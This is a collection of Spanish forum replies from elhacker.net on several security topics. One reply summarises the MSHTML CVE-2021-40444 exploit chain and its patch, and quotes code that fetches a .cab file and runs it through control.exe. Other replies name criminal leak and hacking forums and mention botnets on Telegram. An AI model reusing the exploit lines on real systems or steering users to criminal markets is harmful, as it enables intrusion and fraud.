Mensajes

[C1b3rWall Academy 2021: completo curso online gratuito de ciberseguridad en español]

¿Descargar cursos de dónde?

Dependerá de la plataforma la forma de descargar. No es lo mismo udemy, que Moodle que otra plataforma de enseñanza.

Aquí tienes curso gratuito en Español:

C1b3rWall Academy 2021: completo curso online gratuito de ciberseguridad en español
https://blog.elhacker.net/2021/09/c1b3rwall-academy-2021-completo-curso-online-gratis-ciberseguridad.html

[Microsoft publica el parche para el 0-day de MSHTML (CVE-2021-40444)]

muy interesante, lo he visto hoy publicado en HackPlayers (Vicente Motos)

Microsoft publica el parche para el 0-day de MSHTML (CVE-2021-40444)
https://www.hackplayers.com/2021/09/parche-para-cve-2021-40444-mshtml.html



    Básicamente el documento contiene un objeto MHTML OLE que es un sitio web alojado en un endpoint controlado por un atacante.
    El sitio web ejecuta código javascript ofuscado que crea una instancia de los controles ActiveX: ActiveXObjectVAR['Script']['location'] = '.cpl:../../../AppData/Local/Temp/Low/championship.inf',
    El código del sitio web obtiene y abre un archivo .cab desde el endpoint controlado por el atacante: XMLHttpRopen['call'](XMLHttpR, 'GET', 'http://127.0.0.1/test.cab';, ![]). Este archivo contiene una DLL maliciosa con extensión .inf.
    El código del sitio web ejecuta el archivo.inf como un archivo del Panel de control (.cpl) utilizando la utilidad control.exe. Por ejemplo, el código del sitio web puede ejecutar el siguiente comando: control.exe .cpl: ../../../AppData/Local/Temp/championship.inf.
    La utilidad control.exe se ejecuta como un proceso secundario del proceso que aloja la aplicación de Microsoft Office que abrió el documento de Office, como winword.exe.
    El archivo DLL malicioso .inf se ejecuta en el contexto de rundll32.exe.

Ayer ya publicaron el parche oficial de Microsoft

Actualizaciones de seguridad importantes de Microsoft CVE-2021-40444
https://blog.elhacker.net/2021/09/actualizaciones-de-seguridad-productos-microsoft--chrome-adobe.html

El parche:

las barras (/) se formatearán en barras invertidas (\) contra el recorrido de la ruta; Además, el exploit de IE no puede controlar el campo "ubicación" para ejecutar código con control.exe.



Fuente:
https://twitter.com/aaaddress1/status/1438023534320619524

[Warp, VPN gratuita de CloudFlare para dispositivos móviles]

para teléfonos móviles tienes WARP de CloudFlare, que es una VPN segura y gratuita.

Warp, VPN gratuita de CloudFlare para dispositivos móviles
https://blog.elhacker.net/2019/09/warp-vpn-gratuita-de-cloudflare-para-android-ios.html

Vas a la tienda y pides un duplicado de la SIM y pones un nuevo pin de 4 dígitos y problemas arreglado.

https://raidforums.com/index.php  

jajajaj joder raidForums no xD es todo ilegal

No sé si yo si ahí se publican tutoriales, más bien venta base de datos y todo tipo de leaks. No entiendo aún muy bien como no lo han cerrado.

En inglés:

https://raidforums.com/
https://hackforums.net/

y en Ruso:

XSS, RAMP xD

En Español quedan pocos foros ya activos:

Randomize tiene razón:

https://underc0de.org/foro/

Mensajes similares:

Foro especial
https://foro.elhacker.net/foro_libre/foro_especial-t508669.0.html

¿Foros en la Deep Web en español?
https://foro.elhacker.net/dudas_generales/iquestforos_en_la_deep_web_en_espanol-t511631.0.html

[Cifrar un pendrive USB (proteger pendrive o disco duro externo con contraseña) en Windows, Linux y Mac]

VeraCrypt (sucesor de TrueCrypt) es una buena opción o usar BitLocker de Windows.

Hace relativamente poco escribí en el blog sobre el tema hablando diferentes programas y opciones

Cifrar un pendrive USB (proteger pendrive o disco duro externo con contraseña) en Windows, Linux y Mac
https://blog.elhacker.net/2020/12/cifrar-un-pendrive-usb-proteger-contrasena-bitlocker-windows-linux-macos.html

A ver, haz una denuncia la Guardia Civil o Polícia Nacional de España y explica lo ocurrido.

El resto de cosas que estás preguntando son cosas muy raras......

se podía haber hackeado el sistema informático para cambiar las horas de dichas operaciones

¿Hackear el sistema informático de un banco? ¿Has visto muchas películas de ciencia ficicón últimamente?

O sea los ladrones tienen acceso interno a las cámaras de seguridad del banco y no se les ocurre otra cosa que drogarte a tí para sacarte dinero....

el sistema de vigilancia ya había borrado esas grabaciones por lo tanto no existe ya que han sido sobre escritas por otras.

Normal ¿Cuánto tiempo ha pasado? ¿En el 2014? las grabaciones ocupan espacio en el disco y se van guardando las grabaciones más antiguas

Madre mía realmente la justicia en España es lenta xD

Sería posible que un perito informático haga un informe en el que diga que ese sistema habría podido ser hackeado para cambiar información sobre esos movimientos?

A ver es evidente que en su momento, en el 2014 ya lo mirarían las cámaras de seguridad, entonces que estaban las grabaciones.

Sería mejor que explicaras toda la historia o parte de ella, que no ir explicando por partes, porque no se entiende nada del contexto, hasta que has puesto el último mensaje.

Lo primero que tienes que hacer es lo que comenta apuromafo CLS, es averiguar el tipo de ransomware:

Sube la nota de rescate y podrás averiguar si es posible descifrarlo o por lo contrario, es imposible.

https://id-ransomware.malwarehunterteam.com/

Empieza por el principio.

Si está bien cifrado, es imposible de recuperar.

Algunos gastando mucha, mucha luz:

[youtube=640,360]https://www.youtube.com/watch?v=Lk4hDoeoFuI[/youtube]

[enlaces patrocinados]

también hay los enlaces patrocinados, muy de moda últimamente.

Es decir, escribir un artículo en un blog sobre un tema en concreto y añadir enlaces pagados hacía un sitio web o servicio que alguien desea promocionar sutilmente (no en forma de anuncio). Vaya, contenido esponsorizado.

Por otro lado si conoces una forma de contratar Botnet no dudes en comentar.

Por desgracia en Telegram tienes varios canales que hablan del tema.......